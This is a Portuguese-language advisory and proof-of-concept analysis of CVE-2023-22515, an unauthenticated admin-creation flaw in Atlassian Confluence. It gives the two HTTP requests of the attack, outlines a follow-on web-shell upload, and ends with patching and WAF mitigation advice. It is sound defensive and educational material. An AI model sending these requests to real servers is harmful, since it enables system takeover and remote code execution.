
Análise técnica e exploit de prova de conceito para CVE-2023-22515, uma vulnerabilidade crítica de controle de acesso quebrado no Atlassian Confluence permitindo criação de conta de administrador não autenticado e comprometimento do sistema.
[!IMPORTANT] Alerta de Segurança Urgente: Esta vulnerabilidade tem a pontuação CVSS 10.0 (Crítica), o mais alto nível de risco. Se você estiver usando uma versão afetada, é necessária uma correção imediata.
CVE-2023-22515 é uma vulnerabilidade crítica de Broken Access Control (Controle de Acesso Quebrado) encontrada no Atlassian Confluence Data Center e Server. Um atacante, sem autenticação, pode manipular remotamente o estado de configuração do servidor, criar uma conta de administrador e assumir completamente o sistema.
| Item | Detalhes |
|---|
| ID da Vulnerabilidade | CVE-2023-22515 |
| Nível de Risco | CRÍTICA (CVSS 10.0) |
| Versões Afetadas | 8.0.0 ~ 8.5.1 (verificar versões específicas) |
| Tipo de Ataque | Bypass de Autenticação e Elevação de Privilégios |
Esta vulnerabilidade é desencadeada quando o atacante, por meio do endpoint /server-info.action, altera o valor de bootstrapStatusProvider.applicationConfig.setupComplete para false.
sequenceDiagram
participant Attacker as 😈 Atacante
participant Server as 🖥️ Servidor Confluence
participant Config as ⚙️ Gerenciador de Configuração
Note over Attacker, Server: Fase 1: Ataque de reinicialização do estado de configuração
Attacker->>Server: GET /server-info.action?setupComplete=false
Server->>Config: Desmarca a flag de configuração concluída na memória
Config-->>Server: Alteração de estado concluída (modo de instalação)
Server-->>Attacker: HTTP 200/302 OK
Note over Attacker, Server: Fase 2: Criação de conta de administrador
Attacker->>Server: POST /setup/setupadministrator.action<br/>(Envia novas informações de administrador)
Server->>Server: Bypass da verificação de segurança (permitido por estar em modo de instalação)
Server-->>Attacker: Conta criada com sucesso e login
Note over Attacker, Server: Fase 3: Assunção do sistema (RCE)
Attacker->>Server: Upload de plugin malicioso (Web Shell)
Server-->>Attacker: Obtenção de permissão para execução remota de comandos[!NOTE] Princípio central: Não se modifica o arquivo de configuração persistente (
confluence.cfg.xml), mas sim o estado em tempo de execução na memória, contornando a lógica de controle de acesso.
Ocorre devido a uma vulnerabilidade de binding de parâmetros no framework XWork2 e à falta de validação de entrada externa no atributo sensível (setupComplete) na classe de ação (ServerInfoAction) do Confluence.
O atacante pode neutralizar o servidor com uma simples requisição HTTP.
1. Requisição de reinicialização da configuração:
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com
2. Requisição de criação de administrador:
POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...
O kit de reprodução (cve-2023-22515-repro) fornecido junto com este relatório permite praticar a vulnerabilidade em um ambiente Docker seguro.
Inclui um script de demonstração que mostra visualmente o processo real de hacking no terminal.
# Comando para executar a demo
bash cinematic_pwn.sh
[!TIP] O script de demonstração realiza o ataque contra um servidor real (
localhost:8090), criando uma conta de administrador e tentando o login, mostrando todo o processo de forma automatizada.
A solução mais segura é atualizar para as versões corrigidas fornecidas pela Atlassian.
Caso a correção não seja possível, bloqueie o acesso aos seguintes padrões de URL em equipamentos de segurança de rede (WAF, balanceador de carga, etc.):
*/setup/*O CVE-2023-22515 é uma vulnerabilidade crítica com baixíssima dificuldade de ataque e que permite a assunção total do sistema. Os responsáveis pela segurança devem aplicar a correção imediatamente e monitorar se houve alguma violação.
Data de criação: 2026-01-16 | Autor: Antigravity Security Analysis Team